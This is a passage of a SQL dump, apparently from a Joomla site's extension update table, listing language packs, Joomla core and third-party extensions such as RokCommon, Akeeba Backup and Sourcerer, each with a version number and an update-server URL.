Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10345,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10346,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10347,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10348,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10349,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10350,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10351,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10352,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10353,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10354,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10355,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10356,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10357,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10358,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10359,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10360,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10361,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10362,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10363,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10364,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10365,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10366,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10367,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10368,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10369,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10370,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10371,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10372,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10373,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10374,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10375,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10376,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10377,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10378,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10379,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10380,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10381,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10382,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10383,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10384,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10385,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(10386,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(10387,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(10388,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(10389,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(10390,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(10391,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(10392,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10393,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10394,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10395,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10396,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10397,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10398,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10399,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10400,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10401,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10402,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10403,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10404,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10405,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10406,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10407,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10408,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10409,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10410,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10411,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10412,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10413,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10414,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10415,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10416,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10417,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10418,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10419,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10420,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10421,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10422,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10423,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10424,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10425,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10426,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10427,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10428,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10429,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10430,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10431,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10432,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10433,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10434,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10435,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10436,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10437,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10438,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10439,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10440,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(10441,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(10442,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(10443,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10444,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10445,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/7-0-0.html			\n		',''),(10446,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10447,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10448,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10449,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10450,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10451,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10452,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10453,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10454,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10455,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10456,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10457,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10458,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10459,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10460,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10461,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10462,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10463,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10464,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10465,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10466,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10467,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10468,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10469,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10470,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10471,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10472,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10473,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10474,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10475,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10476,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10477,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10478,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10479,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10480,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10481,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10482,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10483,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10484,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10485,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10486,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10487,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10488,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10489,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10490,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10491,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10492,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10493,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10494,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10495,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10496,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(10497,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(10498,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(10499,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(10500,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(10501,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(10502,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(10503,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10504,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10505,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10506,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10507,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10508,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10509,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10510,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10511,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10512,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10513,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10514,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10515,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10516,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10517,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10518,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10519,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10520,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10521,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10522,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10523,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10524,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10525,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10526,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10527,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10528,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10529,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10530,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10531,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10532,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10533,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10534,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10535,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10536,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10537,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10538,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10539,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10540,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10541,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10542,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10543,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10544,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10545,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10546,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10547,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10548,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10549,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10550,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10551,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10552,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10553,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10554,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10555,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10556,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10557,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10558,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10559,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10560,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10561,57,0,'Serbian 